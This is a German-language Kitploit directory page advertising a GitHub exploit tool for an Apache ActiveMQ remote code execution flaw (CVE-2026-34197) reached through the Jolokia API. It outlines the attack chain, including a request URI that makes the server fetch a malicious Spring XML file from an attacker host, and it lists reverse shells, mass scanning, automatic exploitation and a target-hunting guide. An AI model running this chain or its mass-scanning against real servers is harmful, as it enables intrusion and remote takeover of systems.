Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-34197 — Exploit für Apache ActiveMQ RCE über die Jolokia-API (CVE-2026-34197) mit Erfassung der Befehlsausgabe, Massen-Scanning und automatischer Ausnutzung. | Kitploit
Tools/GitHubGitHub/kondordevsecuritycorp/cve-2026-34197
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingLabs & Praxis
GitHubkondordevsecuritycorp/cve-2026-34197

CVE-2026-34197

Exploit für Apache ActiveMQ RCE über die Jolokia-API (CVE-2026-34197) mit Erfassung der Befehlsausgabe, Massen-Scanning und automatischer Ausnutzung.

Repository anzeigen
2115vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-34197 CVSS 9.8 RCE Python 3.8+

Apache ActiveMQ Jolokia Spring

CVE-2026-34197

Apache ActiveMQ Remote Code Execution über die Jolokia-API

Author Stars Forks Issues License

Überblick • Details • Angriffsablauf • Schnellstart • ATTACKER_IP-Anleitung • Verwendung • Ausgabeerfassung • Scanner • Suche • Erkennung • Behebung


Überblick

CVE-2026-34197 ist eine kritische Remote Code Execution (RCE)-Schwachstelle in Apache ActiveMQ Classic, die es einem authentifizierten Angreifer ermöglicht, beliebige Betriebssystembefehle über die in der Webkonsole bereitgestellte Jolokia-API auszuführen.

Die Schwachstelle existiert seit über 13 Jahren und liegt in der Interaktion zwischen Jolokia (HTTP-JMX-Brücke), ActiveMQ-MBeans, Netzwerk-Connectoren und dem VM-Transport.

[!CAUTION] Dies ist ein erster öffentlicher PoC, entwickelt von KONDOR DEV SECURITY. Nur in autorisierten Sicherheitsbewertungen verwenden.

Hauptfunktionen

  • Befehlsausgabe-Erfassung — einfache Befehle (id, whoami, cat /etc/passwd) zeigen ihre Ausgabe automatisch in Ihrem Terminal an
  • Automatisches Base64-Wrapping — Reverse Shells und Sonderzeichen funktionieren ohne manuelles Escaping
  • 2-Phasen-Scanner (version_check.py) — mehrthreadige Versionserkennung + gezielte Ausnutzung
  • Auth-Fallback — versucht automatisch ohne Authentifizierung, wenn Anmeldedaten fehlschlagen (CVE-2024-32114)
  • Intelligente Broker-Erkennung — erkennt den Broker-Namen automatisch über Jolokia-Wildcard-Abfragen

Schwachstellen-Details

CVE-IDCVE-2026-34197
Schweregrad CVSS 3.1
TypRemote Code Execution (RCE)
CWECWE-20 (Unzureichende Eingabevalidierung) / CWE-94 (Code-Injection)
BetroffenActiveMQ Classic < 5.19.4 und 6.0.0 — 6.2.2
Behoben5.19.4 / 6.2.3
Authentifizierung erforderlichJa (Standard-Anmeldedaten admin:admin sind üblich)
Keine Authentifizierung nötig6.0.0 — 6.1.1 (aufgrund von CVE-2024-32114)
Standard-Port8161 (Webkonsole)

Angriffsablauf```

                CVE-2026-34197 — Exploitation Chain

──────────────────────────────────────────────────────────────

ATTACKER ACTIVEMQ SERVER ──────── ─────────────── │ │ [1] │── POST /api/jolokia/ ──────────────────>│ │ addNetworkConnector( │ │ vm://rce?brokerConfig= │ │ xbean:http://ATTACKER/payload.xml) │ │ │ │ [2] │── Creates VM broker │ │── Fetches remote XML │ │ [3] │<── GET /payload.xml ─────────────────────│ │── Serves malicious Spring XML ─────────>│ │ │ │ [4] │── Spring instantiates beans │ │── Runtime.exec(COMMAND) │ │── ** RCE ACHIEVED ** │ │ [5] │<── POST /output (command stdout) ────────│ (auto, for simple commands) │── Displays command output │ │ │

### Schritt-für-Schritt-Aufschlüsselung

| Schritt | Aktion | Komponente |
|:----:|--------|-----------|
| **1** | Angreifer sendet POST an `/api/jolokia/` und ruft `addNetworkConnector` auf dem Broker-MBean auf | Jolokia API |
| **2** | ActiveMQ verarbeitet die `vm://`-Transport-URI und erstellt einen ephemeren Broker mit `brokerConfig`, der auf eine entfernte URL verweist | VM Transport |
| **3** | Das `xbean:`-Schema löst den Download einer Spring-XML-Konfigurationsdatei vom Server des Angreifers aus | Spring / XBean |
| **4** | Spring instanziiert alle Beans im XML, einschließlich eines, das `Runtime.getRuntime().exec()` aufruft | Spring Context |
| **5** | Bei einfachen Befehlen wird die Ausgabe erfasst und per HTTP-POST an den Listener des Angreifers zurückgesendet (automatisch) | Ausgabeerfassung |

---

## Projektstruktur```
CVE-2026-34197/
├── exploit.py             # PoC exploit (single target + mass scan)
├── version_check.py       # Scanner + Auto-Exploit (2-phase pipeline)
├── payloads/
│   └── template.xml       # Spring XML payload template
├── targets.txt            # Target URLs (one per line)
├── docker/
│   └── docker-compose.yml # Vulnerable lab environment
├── docs/
│   ├── HUNTING_GUIDE_EN.md  # Target hunting guide (English)
│   └── HUNTING_GUIDE_ES.md  # Guía de búsqueda (Español)
├── LICENSE
└── README.md

Schnellstart

Tool herunterladen